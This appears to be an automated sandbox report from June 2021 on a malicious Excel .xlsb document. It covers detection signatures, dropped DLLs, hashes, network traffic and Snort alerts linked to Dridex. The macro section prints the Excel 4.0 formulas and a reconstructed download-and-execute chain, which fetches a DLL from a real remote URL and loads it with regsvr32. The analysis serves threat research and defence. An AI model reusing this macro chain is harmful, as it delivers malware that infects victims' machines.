Analysis Report Documents_13134976_1377491379.xlsb
Overview
General Information
Detection
| Score: | 100 |
|---|---|
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Classification
Process Tree
Malware Configuration

No configs have been found
Yara Overview

Initial Sample

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security | |
Sigma Overview

System Summary:

- Sigma detected: BlueMashroom DLL Load (Author: Florian Roth)
- Sigma detected: Microsoft Office Product Spawning Windows Shell (Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team)
- Sigma detected: Regsvr32 Anomaly (Author: Florian Roth, oscd.community)
Signature Overview

Entries are listed as signature name: evidence type (number of source rows); rows without a signature name are listed by evidence type only.

- File opened (1 entry)
- HTTPS traffic detected (4 entries)
- Code function (2 entries)
Software Vulnerabilities:

- Document exploit detected (creates forbidden files): File created (2 entries)
- Document exploit detected (drops PE files): File created (1 entry)
- Document exploit detected (UrlDownloadToFile): Section loaded (1 entry)
- Document exploit detected (process start blacklist hit): Process created (1 entry)
- DNS query (1 entry)
- TCP traffic (2 entries)
Networking:

- Snort IDS alert for network traffic (e.g. based on Emerging Threat rules): Snort IDS (3 entries)
- Uses ping.exe to check the status of other devices and networks: Process created (1 entry)
- ASN Name (1 entry)
- JA3 fingerprint (2 entries)
- TCP traffic detected without corresponding DNS query (22 entries)
- DNS traffic detected (1 entry)
- String found in binary or memory (172 entries)
- Network traffic detected (8 entries)
- HTTPS traffic detected (4 entries)
System Summary:

- Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros): Screenshot OCR (6 entries)
- Found Excel 4.0 Macro with suspicious formulas: Initial sample (3 entries)
- Office process drops PE file: File created (2 entries)
- Code function (142 entries)
- Dropped File (3 entries)
- Section loaded (7 entries)
- Classification label (1 entry)
- Code function (1 entry)
- File created (1 entry)
- Mutant created (4 entries)
- File created (1 entry)
- File read (1 entry)
- Key opened (1 entry)
- File read (1 entry)
- Process created (28 entries)
- Window detected (1 entry)
- Initial sample (6 entries)
- Key opened (1 entry)
- File opened (1 entry)
- Process created (1 entry)
- File created (3 entries)
- File created (1 entry)
Boot Survival:

- Creates an autostart registry key pointing to binary in C:\Windows: Registry value created or modified (1 entry)
- Drops PE files to the user root directory: File created (1 entry)
- Registry value created or modified (2 entries)
- Registry key monitored for changes (1 entry)
- Process information set (42 entries)
Malware Analysis System Evasion:

- Uses ping.exe to sleep: Process created (6 entries)
- Dropped PE file which has not been started (1 entry)
- Thread sleep time (7 entries)
- Last function (7 entries)
- Code function (2 entries)
- Code function (2 entries)
- Thread delayed (6 entries)
- Binary or memory string (4 entries)
- Process information queried (1 entry)
- Code function (1 entry)
- Code function (1 entry)
- Code function (6 entries)
HIPS / PFW / Operating System Protection Evasion:

- System process connects to network (likely due to code injection or exploit): Network Connect (1 entry)
- Process created (6 entries)
- File source (1 entry)
- Binary or memory string (4 entries)
- Code function (1 entry)
- Code function (1 entry)
- Key value queried (1 entry)
Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting1 | Registry Run Keys / Startup Folder11 | Process Injection112 | Masquerading111 | OS Credential Dumping | System Time Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution43 | DLL Side-Loading1 | Registry Run Keys / Startup Folder11 | Disable or Modify Tools1 | LSASS Memory | Query Registry1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | DLL Side-Loading1 | Virtualization/Sandbox Evasion11 | Security Account Manager | Security Software Discovery21 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection112 | NTDS | Virtualization/Sandbox Evasion11 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting1 | LSA Secrets | Process Discovery3 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Regsvr321 | Cached Domain Credentials | Remote System Discovery11 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | DLL Side-Loading1 | DCSync | System Network Configuration Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | File and Directory Discovery2 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Information Discovery24 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |
Behavior Graph

Screenshots
Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| | 2% | ReversingLabs | | |

Dropped Files

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| | 6% | Metadefender | | Browse |
| | 4% | ReversingLabs | | |
| | 6% | Metadefender | | Browse |
| | 4% | ReversingLabs | | |
| | 6% | Metadefender | | Browse |
| | 4% | ReversingLabs | | |

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

72 URLs scanned, all with 0% detection and label "safe" (60 rated by URL Reputation, 12 by Avira URL Cloud).
Domains and IPs

Contacted Domains

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| tpfcu.com | 107.180.50.232 | true | false | | unknown |
URLs from Memory and Binaries

100 URLs listed, all with Malicious = false; Reputation is high for 68 of them and unknown for 32.
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
8.8.7.7 | unknown | United States | 15169 | GOOGLEUS | false |
107.180.50.232 | tpfcu.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | false |
18.117.84.120 | unknown | United States | 3 | MIT-GATEWAYSUS | true |
Note: 8.8.7.7 is only the target of the ICMP echo requests listed under Snort IDS Alerts (a connectivity check), 107.180.50.232 hosts the payload download, and 18.117.84.120 is the host whose TLS certificate triggered the abuse.ch SSL blacklist (Dridex) alerts on port 443.
Private |
---|
IP |
---|
192.168.2.1 |
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 431937 |
Start date: | 09.06.2021 |
Start time: | 15:20:54 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 8m 4s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | Documents_13134976_1377491379.xlsb |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of new started processes analysed: | 35 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.troj.expl.evad.winXLSB@28/13@1/4 |
EGA Information: | Failed |
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
15:22:03 | API Interceptor | |
15:22:35 | Autostart | |
15:22:43 | Autostart |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Detection of associated samples |
---|---|
18.117.84.120 | malicious (1 associated sample listed; its name and SHA-256 are not preserved in this copy) |
Domains |
---|
No context |
---|
ASN |
---|
Match | Detection of associated samples |
---|---|
AS-26496-GO-DADDY-COM-LLCUS | malicious (20 associated samples listed; names and SHA-256 values not preserved in this copy) |
MIT-GATEWAYSUS | malicious (20 associated samples listed; names and SHA-256 values not preserved in this copy) |
JA3 Fingerprints |
---|
Match | Detection of associated samples |
---|---|
8916410db85077a5460817142dcbc8de | malicious (20 associated samples listed; names and SHA-256 values not preserved in this copy) |
37f463bf4616ecd445d4a1937da06e19 | malicious (20 associated samples listed; names and SHA-256 values not preserved in this copy) |
Dropped Files |
---|
Match | Detection of associated samples |
---|---|
C:\Users\user\AppData\Local\Temp\L3YD7CE.dll | malicious |
C:\Users\user\iepfusn.dll | malicious |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dll | malicious |
Created / dropped Files |
---|
Process: | C:\Windows\System32\regsvr32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60080 |
Entropy (8bit): | 7.995256720209506 |
Encrypted: | true |
SSDEEP: | 768:O78wIEbt8Rc7GHyP7zpxeiB9jTs6cX8ENclXVbFYYDceSKZyhRhbzfgtEnz9BPNZ:A8Rc7GHyhUHsVNPOlhbz2E5BPNiUu+g4 |
MD5: | 6045BACCF49E1EBA0E674945311A06E6 |
SHA1: | 379C6234849EECEDE26FAD192C2EE59E0F0221CB |
SHA-256: | 65830A65CB913BEE83258E4AC3E140FAF131E7EB084D39F7020C7ACC825B0A58 |
SHA-512: | DA32AF6A730884E73956E4EB6BFF61A1326B3EF8BA0A213B5B4AAD6DE4FBD471B3550B6AC2110F1D0B2091E33C70D44E498F897376F8E1998B1D2AFAC789ABEB |
Malicious: | false |
Process: | C:\Windows\System32\regsvr32.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.132472625894721 |
Encrypted: | false |
SSDEEP: | 6:kKgy3Pse8N+SkQlPlEGYRMY9z+4KlDA3RUeWlK1MMx:4Ks8kPlE99SNxAhUe3OMx |
MD5: | B84815C12C603EC6FB8D1EDA4CA29530 |
SHA1: | CD18E3BC8FCFB385C1225EF5ED0FCF1BD9DF0434 |
SHA-256: | 961CA06C24F3E4B504765841EFB908C623E99B0EC81EBB6804928909F4360E52 |
SHA-512: | 7771C7B0CC1743F21C13270B0B8390410E1BBD9BB849F9DF045F5A9976B99A169328F257CD09403420C24B62275F332CE54909F8603970F07C71C90501984D2F |
Malicious: | false |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 134915 |
Entropy (8bit): | 5.369271958078095 |
Encrypted: | false |
SSDEEP: | 1536:lcQIKNEeBXA3gBwlpQ9DQW+z7534ZlCKWXboOilX5ENLWME9:REQ9DQW+zAXOe |
MD5: | 76B550BC14095A4AFBB5E04BE5F42175 |
SHA1: | 2A74379C0333997DFED5BB5F7BDB7F707BAF68E4 |
SHA-256: | 7F1E14B77DF7F3FCEB0C34441CA6F6A68288706308BF5B072FAE111AF6BE0817 |
SHA-512: | 41056D2FD4A84E050F7EDC8F962B02C093AD02F3B2B8E410F424A6E155672AF6BA67D21579EC5B0BF6A56F9E8B71B2B0035C5E6B822B78072D1EB2DCBCA3E94F |
Malicious: | false |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 9924 |
Entropy (8bit): | 7.973758306371751 |
Encrypted: | false |
SSDEEP: | 192:soXrzGktAQUkDfw4om9PEK9u27pwnJyV028/tgXEoCWoB:so9G+fnVEYu27OIW/+XEoCWoB |
MD5: | B34FB4F2F0F9E70B72BA3AFD028CD97C |
SHA1: | C6868336F78DEA1E718965DF3341039581DB5B5A |
SHA-256: | 189D420D344A694FD1928ABACBEC94D9F0EF52BE036CEB8144A9D9A6DD14EAEB |
SHA-512: | 4795600917F8A67A6C5CBD5713CAACE74E0483F8E6BB6D98EAB63BF24A0F71E537E7F8ABD26808630B247D454A3F467595C8343EEB4EA98AFAB49D81964158D6 |
Malicious: | false |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 6177 |
Entropy (8bit): | 7.959095006853368 |
Encrypted: | false |
SSDEEP: | 96:j6KDvZ3QXkQ288GMDBm6hEeWyS8ITRIVg9gPEnbYhbY0Y4pxCpAueydMT1uZMr0a:j6KTV8WBPhqd9qqYTB6peyeT1oMr0a |
MD5: | C7ED6FC355D8632DB1464BE3D56BF5CC |
SHA1: | 615484A338922DDF00B903CFA48060AD60D70207 |
SHA-256: | 26000244FBB0C6B2D76F80166CE85700BC96141C6CD80F8B399CA6F15FE3515C |
SHA-512: | FB4AE09EACD15A4FE778BDF366808C4F9FE403C4054F86704C03C87C7016E7D7A5772677B69064FCB5F1B9345D80C4263A58EA8B5E9CA2B717E24E2B19B85A92 |
Malicious: | false |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 5744 |
Entropy (8bit): | 7.966496386988271 |
Encrypted: | false |
SSDEEP: | 96:4uJgumnoYk22FLjJq17cpKsv+CHI5BXjI1e+HCLDl3kjH1erj+uYU2:4CgJfkfJA7ixCxqe+GDhkT1erj+uYf |
MD5: | 9AD30E24270C495AE68EAF3A1EEECBFB |
SHA1: | 8642D256E7FFBEF5804A2D2220A1FE475A99DC36 |
SHA-256: | 6D3EAD431ABD110369EFABC6F2E474DC24FA3D7EEC28DE43456407C5BACD6D20 |
SHA-512: | EB156DD0686BAAE4F46B0B0C01838DA7225529D3B31912568D36A1CC07BE006EEAD31F464B0252C3A8471ACA71E86EEE9185FE705ABAE08C56B15C63CC891AD5 |
Malicious: | false |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 956 |
Entropy (8bit): | 7.683552542542939 |
Encrypted: | false |
SSDEEP: | 24:64ZJH5wka2YQydYiFNcincNrtNmt5xx4tRFB:JJH5fYuW5c3wPoFB |
MD5: | 32C83607A5C98C5A634278E5AED3AD61 |
SHA1: | EDE34ADEA53C413C4AC8215EA48F2F2FD59F1362 |
SHA-256: | 4A999E919D85EDD0CD1A772CA3B29F91AEECF77D0BEB11FD1B632B7A8A0686BF |
SHA-512: | AF19A013377F0F7B47E54D99D0AFA222BE46072C47944E8640B09A4993DFDDC906B7C68F7E3DAB5B3F126C9AD1090EADBF17FF7068EE8E360D0EA46811C0DB3C |
Malicious: | false |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 23989 |
Entropy (8bit): | 7.989754044300238 |
Encrypted: | false |
SSDEEP: | 384:SGjFc9Ll+HCggc/h3GXoQjZVVawDIPsTDGY9R9cNc+3JY0kEtWhfEWa92ppgMoF3:S5plMCgzGoOzVawisTDGY9Rs3JYhEtqy |
MD5: | 839795652A8FE78F26F4D86D757ABDE8 |
SHA1: | 979E5B90C72EA3E5E9D9B506AFDC981BFCA61B60 |
SHA-256: | 1A9EF0E2F66682B532D15457635920067C4F29EF762D2E8A3E0363B4CF39C13E |
SHA-512: | E6D5CB06679832DE768E23EF42B9780E4E8327A057A3EA0A6CD5B76908B210078EF659CA44C8723960AB59A0DB85A052C45E7A29D7FA8A643275BA5F210F6773 |
Malicious: | false |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 205312 |
Entropy (8bit): | 6.709188825960524 |
Encrypted: | false |
SSDEEP: | 3072:o7tbwam7niPOMFJjOknVCSd/3391UnrWoTmutZ/dyQCK+VBVmICKUizHz2/bf:StbwamK1jlnnV91UrWStFdjaVF2/b |
MD5: | 28193BA741232F91101849F606FA8419 |
SHA1: | 12FD2B9850C58A9384EDCBDEC2F94EFD32B0C0B5 |
SHA-256: | 67E54B44DAD909734A59DF457950C05727B7ECF387F1F37C38C18CEF5AF579C2 |
SHA-512: | 783213432A0CC54B92F5A49B0F314D949D48810A5D1FC36C92D26A302812E9B66618A0666FAE4BD33911DBC0542390844DA1436D4B9BC73A73D12B4C67929D1F |
Malicious: | true |
IE Cache URL: | https://tpfcu.com/getfile.php |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 80566 |
Entropy (8bit): | 7.893302821449264 |
Encrypted: | false |
SSDEEP: | 1536:Xelem3l7eO+dRRVnyY7lMVGoIahaDHTU6hryF70cAeWvijWGHc:bol7eO6RSY72sTU2yF70cAijW2c |
MD5: | 5138B6C608292E4C867FC32717C1CF59 |
SHA1: | 836E1C79573D2D8F2E5FCED81BDCA22EEE921EF1 |
SHA-256: | F04037BBF157BEAF7297874FD3700B1059E20B1E6FBF199C61F2B1E112E660C7 |
SHA-512: | 43AF1CC70CD407BBB7BD1B78B98F1054A85A44C96DDAEA6B1AA3AA2D5D0A943659D445D8566010CE5FB177C2597A57FEEA27D5440B8A8D285E2BD5891A31C67C |
Malicious: | false |
Process: | C:\Windows\System32\regsvr32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 205312 |
Entropy (8bit): | 6.709188825960524 |
Encrypted: | false |
SSDEEP: | 3072:o7tbwam7niPOMFJjOknVCSd/3391UnrWoTmutZ/dyQCK+VBVmICKUizHz2/bf:StbwamK1jlnnV91UrWStFdjaVF2/b |
MD5: | 28193BA741232F91101849F606FA8419 |
SHA1: | 12FD2B9850C58A9384EDCBDEC2F94EFD32B0C0B5 |
SHA-256: | 67E54B44DAD909734A59DF457950C05727B7ECF387F1F37C38C18CEF5AF579C2 |
SHA-512: | 783213432A0CC54B92F5A49B0F314D949D48810A5D1FC36C92D26A302812E9B66618A0666FAE4BD33911DBC0542390844DA1436D4B9BC73A73D12B4C67929D1F |
Malicious: | true |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.6081032063576088 |
Encrypted: | false |
SSDEEP: | 3:RFXI6dtt:RJ1 |
MD5: | 7AB76C81182111AC93ACF915CA8331D5 |
SHA1: | 68B94B5D4C83A6FB415C8026AF61F3F8745E2559 |
SHA-256: | 6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF |
SHA-512: | A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7 |
Malicious: | true |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 205312 |
Entropy (8bit): | 6.709188825960524 |
Encrypted: | false |
SSDEEP: | 3072:o7tbwam7niPOMFJjOknVCSd/3391UnrWoTmutZ/dyQCK+VBVmICKUizHz2/bf:StbwamK1jlnnV91UrWStFdjaVF2/b |
MD5: | 28193BA741232F91101849F606FA8419 |
SHA1: | 12FD2B9850C58A9384EDCBDEC2F94EFD32B0C0B5 |
SHA-256: | 67E54B44DAD909734A59DF457950C05727B7ECF387F1F37C38C18CEF5AF579C2 |
SHA-512: | 783213432A0CC54B92F5A49B0F314D949D48810A5D1FC36C92D26A302812E9B66618A0666FAE4BD33911DBC0542390844DA1436D4B9BC73A73D12B4C67929D1F |
Malicious: | true |
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.867132102918904 |
File name: | Documents_13134976_1377491379.xlsb |
File size: | 64636 |
MD5: | 276bf3db434b887bb77adca0bd46e130 |
SHA1: | eee2be9136f2c70a28b6ca5289e73e2a38453da2 |
SHA256: | 27180043ebeb8f2aa8728c5ee020fb5368be3df4e9008b8f01242bf82d5780ce |
SHA512: | abe0052635a1064304828a7b8fa8663997fb023d542944ddb3bdb346170bd5fbe9a76b2e53184e4b3c7a9e09a768982a396b7253d83c309fd7f522f427262e7a |
SSDEEP: | 1536:LvnO2wWjlMVGoIahaDHTU6hryF70liWWGH0AeWl+R:LGCj2sTU2yF70liWW200+R |
File Content Preview: | PK..........!.+...............[Content_Types].xml ...(.....................................................................................................................................................................................!!.................. |
File Icon |
---|
Icon Hash: | 74f0d0d2c6d6d0f4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "Documents_13134976_1377491379.xlsb" |
---|
Macro 4.0 Code |
---|
CALL(before.2.18.46.sheet!BJ29&before.2.18.46.sheet!BN29, before.2.18.46.sheet!BM35&before.2.18.46.sheet!BM38&before.2.18.46.sheet!BS41&before.2.18.46.sheet!BU41&before.2.18.46.sheet!BS25, before.2.18.46.sheet!BK50&before.2.18.46.sheet!BS42, before.2.18.46.sheet!BP33, before.2.18.46.sheet!BJ19&BJ20&BJ21&BJ22, before.2.18.46.sheet!BN24, before.2.18.46.sheet!BP38, before.2.18.46.sheet!BP41)
=EXEC(Sheet1!BF42&Sheet1!BF43&Sheet1!BF44&Sheet1!BN24)
=HALT()
Non-empty cells of the sheet dump, in the order they appear (the dump is a comma-separated grid in which almost every cell is empty): ht | tps:// | tpfcu.com/getfile. | php | =CALL(...) (the formula above) | =Sheet2!BB10() | ..\iepfusn.dll | A | UR | LMon | 0 | UR | LDownl | 0 | 0 | oa | dToFile | re | CBB | gs | ="vr32 -s " | JJC
Reconstructed call chain (each argument is the & concatenation of the referenced cells; the result agrees with the UrlDownloadToFile, regsvr32 and iepfusn.dll findings elsewhere in this report): |
---|
=CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"https://tpfcu.com/getfile.php","..\iepfusn.dll",0,0) |
=EXEC("regsvr32 -s ..\iepfusn.dll") |
=HALT() |
The CALL type text "JJCCBB" declares a signed 4-byte integer return value and the five URLDownloadToFileA parameters as integer, string, string, double, double. The macro therefore downloads https://tpfcu.com/getfile.php to ..\iepfusn.dll (listed as C:\Users\user\iepfusn.dll under Dropped Files) and then runs regsvr32 -s on it, which loads the DLL silently and executes its DllRegisterServer export.
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
06/09/21-15:22:05.833841 | ICMP | 382 | ICMP PING Windows | | | 192.168.2.6 | 8.8.7.7 |
06/09/21-15:22:05.833841 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.8.7.7 |
06/09/21-15:22:10.528872 | ICMP | 382 | ICMP PING Windows | | | 192.168.2.6 | 8.8.7.7 |
06/09/21-15:22:10.528872 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.8.7.7 |
06/09/21-15:22:20.469415 | ICMP | 382 | ICMP PING Windows | | | 192.168.2.6 | 8.8.7.7 |
06/09/21-15:22:20.469415 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.8.7.7 |
06/09/21-15:22:25.029456 | ICMP | 382 | ICMP PING Windows | | | 192.168.2.6 | 8.8.7.7 |
06/09/21-15:22:25.029456 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.8.7.7 |
06/09/21-15:22:36.677659 | ICMP | 382 | ICMP PING Windows | | | 192.168.2.6 | 8.8.7.7 |
06/09/21-15:22:36.677659 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.8.7.7 |
06/09/21-15:22:41.530548 | ICMP | 382 | ICMP PING Windows | | | 192.168.2.6 | 8.8.7.7 |
06/09/21-15:22:41.530548 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.8.7.7 |
06/09/21-15:22:49.386614 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49740 | 18.117.84.120 | 192.168.2.6 |
06/09/21-15:23:25.363224 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49747 | 18.117.84.120 | 192.168.2.6 |
06/09/21-15:23:57.298792 | TCP | 2023476 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) | 443 | 49750 | 18.117.84.120 | 192.168.2.6 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 9, 2021 15:21:55.282211065 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.420984030 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.421092987 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.422017097 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.558451891 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.561686039 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.561707973 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.561739922 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.561764956 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.561799049 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.561822891 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.606833935 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.743777037 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.743941069 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.744791031 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.920869112 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.927237034 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.927289009 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.927320004 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.927349091 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.927350998 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.927382946 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.927383900 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.927417994 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.927438021 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.927445889 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.927464008 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.927479029 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.927501917 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.927512884 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.927524090 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.927546024 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:55.927555084 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:55.927598953 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.065057993 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.065104961 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.065144062 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.065176010 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.065207005 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.065208912 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.065237045 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.065244913 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.065280914 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.065282106 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
